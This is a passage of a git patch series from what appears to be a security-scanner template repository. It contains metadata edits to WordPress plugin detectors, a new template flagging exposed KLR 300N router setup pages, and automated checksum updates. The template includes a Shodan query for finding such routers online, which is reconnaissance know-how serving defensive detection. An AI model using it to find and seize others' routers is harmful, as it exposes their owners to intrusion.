+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From ea82d21d64b746afee549de7e56084310a31fcda Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 27 Sep 2023 10:04:00 +0530
Subject: [PATCH 0551/1090] Create klr300n-installer.yaml

---
 .../installer/klr300n-installer.yaml          | 36 +++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 http/misconfiguration/installer/klr300n-installer.yaml

diff --git a/http/misconfiguration/installer/klr300n-installer.yaml b/http/misconfiguration/installer/klr300n-installer.yaml
new file mode 100644
index 0000000000..b17ed06001
--- /dev/null
+++ b/http/misconfiguration/installer/klr300n-installer.yaml
@@ -0,0 +1,36 @@
+id: klr300n-install
+
+info:
+  name: KLR 300N Router - Exposed Installation
+  author: andreluna
+  severity: high
+  description: |
+    Home router wireless KLR 300N setup page were Detected.
+  reference:
+    - http://www.keo.com.br/produtos/roteador-klr-300n
+    - http://www.keo.com.br/wp-content/uploads/2017/09/Manual_KLR_300N_03-17_site.pdf
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: html:"def_wirelesspassword"
+  tags: keo,klr300n,misconfig,exposure,iot,install
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    host-redirects: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Roteador Wireless KLR 300N"
+          - "def_wirelesspassword"
+          - "Installation assitance"
+        condition: and
+
+      - type: status
+        status:
+          - 200

From a6cc1fc0ce613caf863a8361e29d61eb2a4fecb8 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 27 Sep 2023 04:46:18 +0000
Subject: [PATCH 0552/1090] Auto Generated New Template Addition List [Wed Sep
 27 04:46:18 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 9442a7afae..c08a9ca12d 100644
--- a/.new-additions
+++ b/.new-additions
@@ -9,6 +9,7 @@ http/misconfiguration/installer/akeeba-installer.yaml
 http/misconfiguration/installer/alma-installer.yaml
 http/misconfiguration/installer/bitrix24-installer.yaml
 http/misconfiguration/installer/gibbon-installer.yaml
+http/misconfiguration/installer/klr300n-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml
 http/misconfiguration/installer/ojs-installer.yaml
 http/misconfiguration/installer/zabbix-installer.yaml

From 23bbf9152953a7c39f1e67509bc81dab176eb709 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 27 Sep 2023 04:46:32 +0000
Subject: [PATCH 0553/1090] Auto Generated Templates Checksum [Wed Sep 27
 04:46:32 UTC 2023] :robot:

---
 templates-checksum.txt | 423 +++++++++++++++++++++--------------------
 1 file changed, 212 insertions(+), 211 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 89cd2afb29..0bbbd267de 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -8,8 +8,8 @@ TEMPLATES-STATS.json:17f21c160bed72fb6f675d0f5ade4b5e191870b0
 TEMPLATES-STATS.md:2c7c3af0ac116eb78b25f1537ab533d51f167dcf
 TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:ea50d934bd6f4d67ccdf4cfba0dd3b997fa1e52c
-cves.json-checksum.txt:263d1c5437bc59b8e969b3db7f11e87193a8ce6d
+cves.json:0bab0d9ddda6759c34bb88d57e44c11030dd69e4
+cves.json-checksum.txt:9212314a5ad1b8744e91fe1534a405b326c4e645
 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c
@@ -362,7 +362,7 @@ helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56
 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b
 helpers/wordpress/plugins/ad-inserter.txt:048ceafceae47b034560600476a295b608c60cf4
 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6
-helpers/wordpress/plugins/admin-menu-editor.txt:4572917cbde34e4ba98ab9a65059efd81be6594b
+helpers/wordpress/plugins/admin-menu-editor.txt:aa8d05244067e63778197cff65d9209d713328a4
 helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7df
 helpers/wordpress/plugins/advanced-custom-fields.txt:cffca9b2145cbe8b44269c74219f807eace99c3e
 helpers/wordpress/plugins/akismet.txt:e710dd44fa12f98194f8bba2bb20cba7bee18ff6
@@ -372,7 +372,7 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc
 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f
 helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57
 helpers/wordpress/plugins/antispam-bee.txt:bd5240b767bb950186835acb8bf1d4cb794a5706
-helpers/wordpress/plugins/astra-sites.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5
+helpers/wordpress/plugins/astra-sites.txt:23d49915eae53800c735cfc0f01c21a9d05e727a
 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711
 helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3
 helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109
@@ -485,13 +485,13 @@ helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7
 helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6
 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308
 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:4119e202faec947c57ff360c949b277fd6c29cd4
-helpers/wordpress/plugins/pixelyoursite.txt:f358a15cc523a1f31429fce832dc8c0c554fc41b
+helpers/wordpress/plugins/pixelyoursite.txt:af04551215298737e83ffeff86e0a4a63e5f57af
 helpers/wordpress/plugins/polylang.txt:c7fc6bde7dbf4cb2d89ab4b2bd57e166ce750ec0
 helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7
 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe
 helpers/wordpress/plugins/post-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7
 helpers/wordpress/plugins/post-types-order.txt:31f566259c1a3f810256e3679e10faa457bb4a0b
-helpers/wordpress/plugins/premium-addons-for-elementor.txt:befa0edb7ef642be5e7dfc7cc7c69bc31127207e
+helpers/wordpress/plugins/premium-addons-for-elementor.txt:1782590faaba5ee6facdf2297f1590794447be5a
 helpers/wordpress/plugins/pretty-link.txt:eedf6a14348e4bc362e215e4dcd1e066e0bd16f7
 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/really-simple-ssl.txt:b638f84cceb02801b7ef7b94df984fd22b23f59e
@@ -500,8 +500,8 @@ helpers/wordpress/plugins/redux-framework.txt:0f2d74125dea18acce67c02619dcfea86c
 helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4
 helpers/wordpress/plugins/safe-svg.txt:595d550379b2cb8bccb9659627308ff4e751d23f
 helpers/wordpress/plugins/seo-by-rank-math.txt:ee6a6cf943f9c499c0224b71af2aaa48cb166774
-helpers/wordpress/plugins/sg-cachepress.txt:9c381dd6bbe0788e8717d7adc6b2f8b8d3687aaa
-helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4
+helpers/wordpress/plugins/sg-cachepress.txt:04e136873d85cb62901bb699285d9280e05828df
+helpers/wordpress/plugins/sg-security.txt:a2048abb201b6201e7cd25e8b0262758a98d59da
 helpers/wordpress/plugins/shortcodes-ultimate.txt:c53ed3ab1a6689cbfb71149816b427f4cf870dc3
 helpers/wordpress/plugins/shortpixel-image-optimiser.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e
 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b
@@ -537,8 +537,8 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6
 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3
 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:7035802a8f118b141c54f97b9e8bf36b7d7f53a2
-helpers/wordpress/plugins/woocommerce-payments.txt:60e6b29cae222d0ccf5641a7ebe9d778961c2629
-helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0
+helpers/wordpress/plugins/woocommerce-payments.txt:5087f47c1da6ef46c35e08c9ec1a9e2db4fc24a4
+helpers/wordpress/plugins/woocommerce-paypal-payments.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f
 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87
 helpers/wordpress/plugins/woocommerce-services.txt:440a9edb1796d0cd5f2d71aea1a74af81b05abbd
 helpers/wordpress/plugins/woocommerce.txt:dfaff11acbd25d0758b7c5294b4ff9d37debac19
@@ -4507,6 +4507,7 @@ http/misconfiguration/installer/impresspages-installer.yaml:0d25cc61a9726b3527e2
 http/misconfiguration/installer/indegy-sensor-installer.yaml:c4b65b906536d0e71d9128a43b1bbf31c7c6ad55
 http/misconfiguration/installer/jira-setup.yaml:98368f306cef91d92ecd53725eca807b2cf1af2a
 http/misconfiguration/installer/joomla-installer.yaml:9f89a6d16c8fef98b9a4de986d22768b2aa76895
+http/misconfiguration/installer/klr300n-installer.yaml:24c4c70cfdf1cfbde3df5ce9bdad6c9822383e1a
 http/misconfiguration/installer/limesurvey-installer.yaml:54fa5e339c11fa21e16c99344948bfcd4c854335
 http/misconfiguration/installer/lmszai-installer.yaml:bd5e1d6df6913b83a85555d8015ece59b19bf27a
 http/misconfiguration/installer/lychee-installer.yaml:54b1ca8400339d8ce3442109dea8356a809288a2
@@ -5860,218 +5861,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
+http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
+http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
+http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
+http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
+http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
+http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
+http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
+http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
+http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
+http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
+http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
+http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
+http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
+http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
+http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
+http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
+http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
+http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
-http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
-http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
+http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
+http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
+http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
+http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
+http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
+http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
+http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
+http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
+http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
+http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
+http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
+http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
